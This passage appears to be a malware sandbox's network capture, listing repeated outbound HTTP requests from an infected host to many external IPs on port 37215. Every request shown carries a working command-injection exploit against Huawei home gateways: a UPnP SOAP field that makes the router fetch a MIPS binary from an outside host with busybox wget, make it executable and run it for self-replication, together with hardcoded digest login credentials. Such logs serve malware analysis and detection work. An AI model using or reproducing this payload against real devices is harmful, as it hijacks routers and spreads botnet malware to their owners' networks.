62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1001192.168.2.1360934177.171.158.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.459414005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1002192.168.2.133894841.193.171.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.459640026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1003192.168.2.1349076197.213.204.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.460319996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1004192.168.2.134554658.54.241.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.460372925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1005192.168.2.1340356157.20.110.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.460407972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1006192.168.2.1334654157.57.94.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.460464001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1007192.168.2.1346990197.139.66.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.460479975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1008192.168.2.134160441.203.93.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.460573912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1009192.168.2.1357744148.43.156.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.460603952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1010192.168.2.135753641.9.25.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.461957932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1011192.168.2.135673841.32.158.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.498147011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
